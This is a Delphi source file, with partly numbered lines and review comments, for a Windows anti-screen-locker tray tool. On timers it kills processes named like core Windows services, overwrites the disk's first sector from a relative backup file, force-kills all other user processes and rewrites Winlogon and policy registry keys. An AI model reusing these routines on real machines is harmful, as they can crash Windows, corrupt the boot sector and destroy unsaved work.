  1. unit Unit1;
  2.  
  3. interface
  4.  
  5. uses
  6. Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  7. Dialogs, ExtCtrls, ShellAPI, TlHelp32, Menus, ExtCtrlsX,
  8. XPMan, StdCtrls, Registry;
  9.  
  type
    { Main form of the unit. The balloon text set in D1Click describes the
      program as "GoodBye! Winlock! v1.0", a tool meant to protect against
      programs that block the system. The published fields are streamed from
      the .dfm, which is not shown here, so which handler each component is
      wired to is presumably given by the matching names (tmr1 -> tmr1Timer,
      D1 -> D1Click, ...) - confirm against the form file. }
    TForm1 = class(TForm)
      tmr1: TTimer;
      tmr2: TTimer;
      trycn1: TTrayIcon;          // tray icon used for the balloon hints
      pm1: TPopupMenu;
      D1: TMenuItem;
      D2: TMenuItem;
      d3: TMenuItem;
      D4: TMenuItem;
      xpmnfst1: TXPManifest;
      btn1: TButton;              // clicked programmatically by tmr2Timer
      btn2: TButton;              // clicked programmatically by tmr4Timer / tmr5Timer
      tmr3: TTimer;
      tmr4: TTimer;
      tmr5: TTimer;
      N1: TMenuItem;
      N2: TMenuItem;
      // Terminates processes named like core Windows processes (see KillTask).
      procedure tmr1Timer(Sender: TObject);
      // Terminates the application.
      procedure D4Click(Sender: TObject);
      // Triggers btn1Click.
      procedure tmr2Timer(Sender: TObject);
      // Saves sector 0 of PhysicalDrive0 to backup.bin, or writes it back if the file exists.
      procedure btn1Click(Sender: TObject);
      // Shows the tray balloon at start-up.
      procedure FormCreate(Sender: TObject);
      // Clears the SPI_SETFASTTASKSWITCH / SPI_SCREENSAVERRUNNING settings.
      procedure tmr3Timer(Sender: TObject);
      // Clean-up routine: closes windows, kills other user processes, resets policy and autorun keys.
      procedure btn2Click(Sender: TObject);
      // Runs btn2Click when explorer.exe is not running.
      procedure tmr4Timer(Sender: TObject);
      // Runs btn2Click when sound.exe is running.
      procedure tmr5Timer(Sender: TObject);
      // Disables all five timers.
      procedure d3Click(Sender: TObject);
      // Enables all five timers.
      procedure D2Click(Sender: TObject);
      // Shows the "about" balloon.
      procedure D1Click(Sender: TObject);
      // Always vetoes closing the form.
      procedure FormCloseQuery(Sender: TObject; var CanClose: Boolean);
    private
      { Private declarations }
    public
      { Public declarations }
    end;

  var
    Form1: TForm1;
  49.  
  50. implementation
  51.  
  52. {$R *.dfm}
  53.  
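  { Returns the path reported for the first module of the process that owns
    window H, or '' when the owner cannot be determined.

    Fixes over the original:
    - the snapshot handle is compared with INVALID_HANDLE_VALUE; comparing an
      unsigned THandle with -1 does not reliably detect failure;
    - a failed GetWindowThreadProcessId no longer leaves Pid uninitialised
      (a Pid of 0 would make the snapshot describe the calling process and
      return this program's own path for a foreign window);
    - the snapshot handle is released on every path. }
  function HandleToFullPath(H: HWND): String;
  var
    Pid: Cardinal;
    M: TModuleEntry32;
    HSnapshot: THandle;
  begin
    Result := '';
    Pid := 0;
    if (GetWindowThreadProcessId(H, @Pid) = 0) or (Pid = 0) then
      Exit;

    HSnapshot := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, Pid);
    if HSnapshot = INVALID_HANDLE_VALUE then
      Exit;
    try
      // dwSize must be set before the first Module32First call.
      M.dwSize := SizeOf(TModuleEntry32);
      if Module32First(HSnapshot, M) then
        Result := M.szExePath;
    finally
      CloseHandle(HSnapshot);
    end;
  end;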
  70.  
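  { Terminates every process whose image name equals ExeFileName
    (case-insensitive; the snapshot name is compared both as-is and with any
    directory part stripped).

    Returns the result of the last termination attempt as an Integer
    (non-zero = TerminateProcess succeeded), or 0 when nothing matched or the
    process list could not be read.

    Fixes over the original:
    - the handle returned by OpenProcess is closed (it leaked on every match);
    - TerminateProcess is not called with a null handle when OpenProcess fails;
    - the snapshot handle is validated and always released.

    NOTE(review): matching is by image name only. A name says nothing about
    where the binary lives or who started it, so a genuine system process and
    a look-alike are indistinguishable here. Callers that pass names of
    Windows components should check the image path first. }
  function KillTask(ExeFileName: String): Integer;
  const
    Process_Terminate = $0001;
  var
    ContinueLoop: BOOL;
    FSnapShotHandle: THandle;
    ProcHandle: THandle;
    FProcessEntry32: TProcessEntry32;
    Wanted: String;
  begin
    Result := 0;
    FSnapShotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if FSnapShotHandle = INVALID_HANDLE_VALUE then
      Exit;
    try
      Wanted := UpperCase(ExeFileName); // loop-invariant, computed once
      FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
      ContinueLoop := Process32First(FSnapShotHandle, FProcessEntry32);
      while ContinueLoop do
      begin
        if (UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = Wanted) or
           (UpperCase(FProcessEntry32.szExeFile) = Wanted) then
        begin
          ProcHandle := OpenProcess(Process_Terminate, False,
            FProcessEntry32.th32ProcessID);
          if ProcHandle <> 0 then
            try
              Result := Integer(TerminateProcess(ProcHandle, 0));
            finally
              CloseHandle(ProcHandle);
            end
          else
            Result := 0; // access denied or process already gone
        end;
        ContinueLoop := Process32Next(FSnapShotHandle, FProcessEntry32);
      end;
    finally
      CloseHandle(FSnapShotHandle);
    end;
  end;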
  91.  
  { EnumWindows callback. For each visible, non-minimised top-level window
    that is not the taskbar ('Shell_TrayWnd'), the desktop ('ProgMan'), an
    'Indicator' window, a topmost window or this program's own form, the
    window is hidden and then shown again with the show command in Param.
    Returns True for any non-zero handle so that enumeration continues.

    NOTE(review): the Win32 callback contract uses BOOL/LPARAM; this
    declaration uses Boolean/Integer - confirm that is intended. }
  function MyCallback(Wnd: THandle; Param: integer): boolean; stdcall;
  var
    exStyle: longint;
    taskbarWnd, desktopWnd: integer;
  begin
    taskbarWnd := FindWindow('Shell_TrayWnd', nil);
    desktopWnd := FindWindow('ProgMan', 'Program Manager');
    Result := Wnd <> 0;
    // Keep only the topmost bit of the extended style.
    exStyle := GetWindowLong(Wnd, GWL_EXSTYLE) and WS_EX_TOPMOST;

    // Guard clauses, in the order the original condition evaluated them.
    if not Result then Exit;
    if not IsWindowVisible(Wnd) then Exit;
    if IsIconic(Wnd) then Exit;
    if Wnd = taskbarWnd then Exit;
    if Wnd = desktopWnd then Exit;
    if Wnd = FindWindow('Indicator', nil) then Exit;
    if exStyle = WS_EX_TOPMOST then Exit;
    if Wnd = Form1.Handle then Exit;

    ShowWindow(Wnd, SW_HIDE);
    ShowWindow(Wnd, Param);
  end;
  110.  
  111.  
  { Walks all top-level windows and lets MyCallback re-show the eligible
    ones with the show command Cmd (for example SW_SHOWMINIMIZED). }
  procedure ShowAllWindows(Cmd: integer);
  begin
    // Cmd travels to the callback as the enumeration's user parameter.
    EnumWindows(@MyCallback, Cmd);
  end;
  116.  
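  { Returns True when at least one running process has the image name
    exeFileName (case-insensitive; the snapshot name is compared both as-is
    and with any directory part stripped).

    Fixes over the original: the snapshot handle is validated and always
    released, and the scan stops at the first match instead of walking the
    rest of the process list.

    NOTE(review): this is a name match only; it does not tell a genuine
    binary from a look-alike with the same file name. }
  function processExists(exeFileName: string): Boolean;
  var
    ContinueLoop: BOOL;
    FSnapshotHandle: THandle;
    FProcessEntry32: TProcessEntry32;
    Wanted: string;
  begin
    Result := False;
    FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if FSnapshotHandle = INVALID_HANDLE_VALUE then
      Exit;
    try
      Wanted := UpperCase(exeFileName);
      FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
      ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
      while ContinueLoop do
      begin
        if (UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = Wanted) or
           (UpperCase(FProcessEntry32.szExeFile) = Wanted) then
        begin
          Result := True;
          Break;
        end;
        ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
      end;
    finally
      CloseHandle(FSnapshotHandle);
    end;
  end;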
  139.  
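  { Copies the first 512-byte sector of \\.\PhysicalDrive0 to 'backup.bin'.

    Fixes over the original, which ignored every API result:
    - the disk is opened read-only (GENERIC_READ) instead of GENERIC_ALL;
    - nothing is written unless a full sector was read and it ends with the
      boot signature $55 $AA, so a failed read can no longer leave behind an
      empty or garbage backup that MBRLoad would later put on the disk;
    - a short write removes the partial file;
    - both handles are validated and always closed.

    NOTE(review): 'backup.bin' is a relative path and resolves against the
    process's current directory. Anything able to place or replace a file
    there controls what MBRLoad writes to sector 0; an absolute,
    access-controlled location is safer. }
  procedure MBRSave;
  const
    SectorSize = 512;
  var
    hDisk, hFile: THandle;
    buf: array [0..SectorSize - 1] of Byte;
    nr, nw: Cardinal;
    Written: Boolean;
  begin
    hDisk := CreateFileA('\\.\PhysicalDrive0', GENERIC_READ,
      FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
    if hDisk = INVALID_HANDLE_VALUE then
      Exit;
    try
      nr := 0;
      if (not ReadFile(hDisk, buf, SectorSize, nr, nil)) or (nr <> SectorSize) then
        Exit;
    finally
      CloseHandle(hDisk);
    end;

    // A boot sector ends with $55 $AA; refuse to back up anything else.
    if (buf[SectorSize - 2] <> $55) or (buf[SectorSize - 1] <> $AA) then
      Exit;

    hFile := CreateFileA('backup.bin', GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, 0);
    if hFile = INVALID_HANDLE_VALUE then
      Exit;
    try
      nw := 0;
      Written := WriteFile(hFile, buf, SectorSize, nw, nil) and (nw = SectorSize);
    finally
      CloseHandle(hFile);
    end;

    // Never leave a truncated backup behind.
    if not Written then
      SysUtils.DeleteFile('backup.bin');
  end;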
  153.  
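  { Writes the 512-byte sector stored in 'backup.bin' back to the first
    sector of \\.\PhysicalDrive0.

    Fixes over the original, which ignored every API result and wrote
    whatever byte count the file read produced:
    - the backup is read first and must be exactly one sector ending with the
      boot signature $55 $AA; otherwise the disk is not opened at all;
    - the backup file is opened read-only and the disk write-only instead of
      GENERIC_ALL on both;
    - both handles are validated and always closed.

    NOTE(review): the signature test is only a sanity check, not an integrity
    check. 'backup.bin' is a relative path with no checksum or access
    control, so its content should be treated as untrusted until the caller
    can vouch for it. }
  procedure MBRLoad;
  const
    SectorSize = 512;
  var
    hDisk, hFile: THandle;
    buf: array [0..SectorSize - 1] of Byte;
    nr, nw: Cardinal;
  begin
    hFile := CreateFileA('backup.bin', GENERIC_READ, FILE_SHARE_READ, nil,
      OPEN_EXISTING, 0, 0);
    if hFile = INVALID_HANDLE_VALUE then
      Exit;
    try
      nr := 0;
      if (not ReadFile(hFile, buf, SectorSize, nr, nil)) or (nr <> SectorSize) then
        Exit;
    finally
      CloseHandle(hFile);
    end;

    // Refuse to overwrite sector 0 with data that is not a boot sector.
    if (buf[SectorSize - 2] <> $55) or (buf[SectorSize - 1] <> $AA) then
      Exit;

    hDisk := CreateFileA('\\.\PhysicalDrive0', GENERIC_WRITE,
      FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
    if hDisk = INVALID_HANDLE_VALUE then
      Exit;
    try
      nw := 0;
      WriteFile(hDisk, buf, SectorSize, nw, nil);
    finally
      CloseHandle(hDisk);
    end;
  end;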
  167.  
  { Timer tick: asks KillTask to terminate every process whose image name is
    one of five Windows component names.

    NOTE(review): KillTask matches by file name only, so the genuine system
    processes carrying these names are candidates as well; ending them
    destabilises Windows. Presumably the targets are look-alikes started in
    the user's session - confirm, and restrict the match by image path. }
  procedure TForm1.tmr1Timer(Sender: TObject);
  const
    Targets: array [0..4] of string = (
      'smss.exe', 'csrss.exe', 'winlogon.exe', 'services.exe', 'lsass.exe');
  var
    i: Integer;
  begin
    for i := Low(Targets) to High(Targets) do
      KillTask(Targets[i]);
  end;
  176.  
  { Menu handler: ends the program. FormCloseQuery vetoes every close
    request, and this handler ends the application directly. }
  procedure TForm1.D4Click(Sender: TObject);
  begin
    Application.Terminate;
  end;
  181.  
  { Timer tick: runs the sector save/restore step by clicking btn1, which
    invokes btn1Click. }
  procedure TForm1.tmr2Timer(Sender: TObject);
  begin
    Self.btn1.Click;
  end;
  186.  
  { Takes a backup of sector 0 when none exists yet; otherwise writes the
    existing backup back to the disk.

    NOTE(review): the decision rests only on whether a file called
    'backup.bin' is present in the current directory. The file's origin and
    content are not checked here. }
  procedure TForm1.btn1Click(Sender: TObject);
  begin
    if not FileExists('backup.bin') then
      MBRSave
    else
      MBRLoad;
  end;
  194.  
  { Form start-up: shows the tray icon's balloon hint once. }
  procedure TForm1.FormCreate(Sender: TObject);
  begin
    Self.trycn1.ShowBalloonHint;
  end;
  199.  
  { Timer tick: sets the SPI_SETFASTTASKSWITCH and SPI_SCREENSAVERRUNNING
    system parameters to 0.
    NOTE(review): presumably this undoes a locker that raised the
    "screen saver running" flag to suppress task-switch keys - confirm. }
  procedure TForm1.tmr3Timer(Sender: TObject);
  begin
    // uiParam = 0 switches the setting off; no buffer, no WIN.INI update.
    SystemParametersInfo(SPI_SETFASTTASKSWITCH,  0, 0, 0);
    SystemParametersInfo(SPI_SCREENSAVERRUNNING, 0, 0, 0);
  end;
  205.  
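  { Clean-up routine, run when a timer decides the desktop has been taken over.
    Steps, in order:
      1. post SC_CLOSE, then SC_MINIMIZE, to the visible top-level windows
         below this form, and re-show the rest minimised;
      2. run TASKKILL against every process of the current user except this
         program;
      3. reset the policy values DisableTaskMgr, DisableCMD,
         DisableRegistryTools and NoClose to 0, and delete NoViewOnDrive;
      4. delete the Winlogon\Notify\Run values and the 'windows' / 'userini'
         autorun values;
      5. set the Winlogon Shell value to Explorer.exe and restart Explorer.

    Fixes over the original:
    - the second TASKKILL filter was missing its closing quote;
    - cmd.exe and explorer.exe are started by absolute path taken from
      GetSystemDirectory / GetWindowsDirectory instead of a hard-coded
      'C:\Windows\system32\' and a bare file name left to the search path;
    - registry objects are freed in try/finally, and a failing registry step
      (for example an HKLM write without administrative rights) is logged
      and skipped instead of raising and aborting the remaining steps;
    - keys are no longer created just to delete values from them.

    NOTE(review): step 2 ends every other process of the user without
    warning, so unsaved work in other applications is lost. }
  procedure TForm1.btn2Click(Sender: TObject);

    { Posts WM_SYSCOMMAND/SysCmd to each visible, non-minimised, parentless
      window that follows this form in Z-order. }
    procedure PostToWindowsBelow(SysCmd: Integer);
    var
      WH: HWND;
    begin
      WH := GetNextWindow(Handle, GW_HWNDNEXT);
      while WH <> 0 do
      begin
        if (GetParent(WH) = 0) and (not IsIconic(WH)) and IsWindowVisible(WH) then
          PostMessage(WH, WM_SYSCOMMAND, SysCmd, 0);
        WH := GetNextWindow(WH, GW_HWNDNEXT);
      end;
    end;

    { Reports a skipped registry step to the debugger output. }
    procedure LogSkipped(const Key: string);
    begin
      OutputDebugString(PChar('btn2Click: registry step skipped for ' + Key));
    end;

    { Writes an integer value, creating the key if needed (as the original did). }
    procedure WriteDword(Root: HKEY; const Key, Name: string; Value: Integer);
    var
      R: TRegistry;
    begin
      R := TRegistry.Create;
      try
        R.RootKey := Root;
        try
          if R.OpenKey(Key, True) then
          begin
            R.WriteInteger(Name, Value);
            R.CloseKey;
          end
          else
            LogSkipped(Key);
        except
          on ERegistryException do
            LogSkipped(Key);
        end;
      finally
        R.Free;
      end;
    end;

    { Writes a string value, creating the key if needed (as the original did). }
    procedure WriteText(Root: HKEY; const Key, Name, Value: string);
    var
      R: TRegistry;
    begin
      R := TRegistry.Create;
      try
        R.RootKey := Root;
        try
          if R.OpenKey(Key, True) then
          begin
            R.WriteString(Name, Value);
            R.CloseKey;
          end
          else
            LogSkipped(Key);
        except
          on ERegistryException do
            LogSkipped(Key);
        end;
      finally
        R.Free;
      end;
    end;

    { Deletes the named values if the key exists; never creates the key. }
    procedure DropValues(Root: HKEY; const Key: string; const Names: array of string);
    var
      R: TRegistry;
      i: Integer;
    begin
      R := TRegistry.Create;
      try
        R.RootKey := Root;
        if R.OpenKey(Key, False) then
        begin
          for i := Low(Names) to High(Names) do
            R.DeleteValue(Names[i]);
          R.CloseKey;
        end;
      finally
        R.Free;
      end;
    end;

    { Returns the system directory with a trailing delimiter, or '' on failure. }
    function SystemDir: string;
    var
      Buf: array [0..MAX_PATH] of Char;
      Len: UINT;
    begin
      Result := '';
      Len := GetSystemDirectory(Buf, Length(Buf));
      if (Len > 0) and (Len < UINT(Length(Buf))) then
        Result := IncludeTrailingPathDelimiter(Buf);
    end;

    { Returns the Windows directory with a trailing delimiter, or '' on failure. }
    function WindowsDir: string;
    var
      Buf: array [0..MAX_PATH] of Char;
      Len: UINT;
    begin
      Result := '';
      Len := GetWindowsDirectory(Buf, Length(Buf));
      if (Len > 0) and (Len < UINT(Length(Buf))) then
        Result := IncludeTrailingPathDelimiter(Buf);
    end;

  const
    PolSystem   = 'software\Microsoft\Windows\CurrentVersion\Policies\system';
    PolExplorer = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer';
    RunKey      = 'software\Microsoft\Windows\CurrentVersion\run';
    WinlogonKey = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon';
  var
    SysPath, WinPath: string;
  begin
    // 1. Close, then minimise, what is on screen; re-show the rest minimised.
    PostToWindowsBelow(SC_CLOSE);
    PostToWindowsBelow(SC_MINIMIZE);
    ShowAllWindows(SW_SHOWMINIMIZED);

    // 2. End every other process of this user. Both /FI filters are now quoted.
    SysPath := SystemDir;
    if SysPath <> '' then
      ShellExecute(0, 'open', PChar(SysPath + 'cmd.exe'),
        PChar('/c TASKKILL /F /FI "Imagename ne ' +
          ExtractFileName(Application.ExeName) +
          '" /FI "USERNAME eq %USERNAME%"'),
        PChar(SysPath), SW_HIDE);

    // 3. Re-enable the tools that the policy values switch off.
    WriteDword(HKEY_CURRENT_USER, PolSystem, 'DisableTaskMgr', 0);
    WriteDword(HKEY_CURRENT_USER, 'Software\Policies\Microsoft\Windows\System',
      'DisableCMD', 0);
    WriteDword(HKEY_CURRENT_USER, PolSystem, 'DisableRegistryTools', 0);
    DropValues(HKEY_LOCAL_MACHINE, PolExplorer, ['NoViewOnDrive']);
    WriteDword(HKEY_CURRENT_USER, PolExplorer, 'NoClose', 0);

    // 4. Remove the autorun entries this tool knows about.
    DropValues(HKEY_LOCAL_MACHINE,
      'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Run',
      ['Asynchronous', 'Impersonate', 'DllName', 'Logon']);
    DropValues(HKEY_CURRENT_USER, RunKey, ['windows']);
    DropValues(HKEY_LOCAL_MACHINE, RunKey, ['userini']);

    // 5. Set the shell value and restart Explorer.
    WriteText(HKEY_LOCAL_MACHINE, WinlogonKey, 'Shell', 'Explorer.exe');
    KillTask('explorer.exe');
    WinPath := WindowsDir;
    if WinPath <> '' then
      ShellExecute(0, 'open', PChar(WinPath + 'explorer.exe'), nil, nil, SW_NORMAL)
    else
      // Fall back to the original call rather than leave the user without a shell.
      WinExec('explorer.exe', SW_NORMAL);
  end;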
  296.  
  { Timer tick: when no process named explorer.exe is running, triggers the
    clean-up routine by clicking btn2. Does nothing otherwise. }
  procedure TForm1.tmr4Timer(Sender: TObject);
  begin
    if not processExists('explorer.exe') then
      btn2.Click;
  end;
  312.  
  { Timer tick: when a process named sound.exe is running, triggers the
    clean-up routine by clicking btn2. Does nothing otherwise.
    NOTE(review): 'sound.exe' is presumably the image name of a specific
    locker this tool was written against - confirm; a name match alone will
    also hit any unrelated program with that file name. }
  procedure TForm1.tmr5Timer(Sender: TObject);
  begin
    if processExists('sound.exe') then
      btn2.Click;
  end;
  328.  
  { Menu handler: stops all five timers and tells the user through the tray
    balloon (the Russian text reads "Protection is off!"). }
  procedure TForm1.d3Click(Sender: TObject);
  const
    Active = False;
  begin
    tmr1.Enabled := Active;
    tmr2.Enabled := Active;
    tmr3.Enabled := Active;
    tmr4.Enabled := Active;
    tmr5.Enabled := Active;

    trycn1.BalloonHint := 'Защита выключена !';
    trycn1.ShowBalloonHint;
  end;
  339.  
  { Menu handler: starts all five timers and tells the user through the tray
    balloon (the Russian text reads "Protection is on!"). }
  procedure TForm1.D2Click(Sender: TObject);
  const
    Active = True;
  begin
    tmr1.Enabled := Active;
    tmr2.Enabled := Active;
    tmr3.Enabled := Active;
    tmr4.Enabled := Active;
    tmr5.Enabled := Active;

    trycn1.BalloonHint := 'Защита включена !';
    trycn1.ShowBalloonHint;
  end;
  350.  
  { Menu handler: shows the "about" balloon. The Russian text says that the
    program lets the user protect against programs that block the system. }
  procedure TForm1.D1Click(Sender: TObject);
  begin
    with trycn1 do
    begin
      BalloonHint := 'GoodBye! Winlock! v1.0 - данная программа позволяет защититься от программ которые блокируют работу системы';
      ShowBalloonHint;
    end;
  end;
  356.  
  { Close query: always refuses, so the form cannot be closed through the
    normal close path. D4Click calls Application.Terminate instead. }
  procedure TForm1.FormCloseQuery(Sender: TObject; var CanClose: Boolean);
  begin
    CanClose := not True;
  end;
  361.  
  362. end.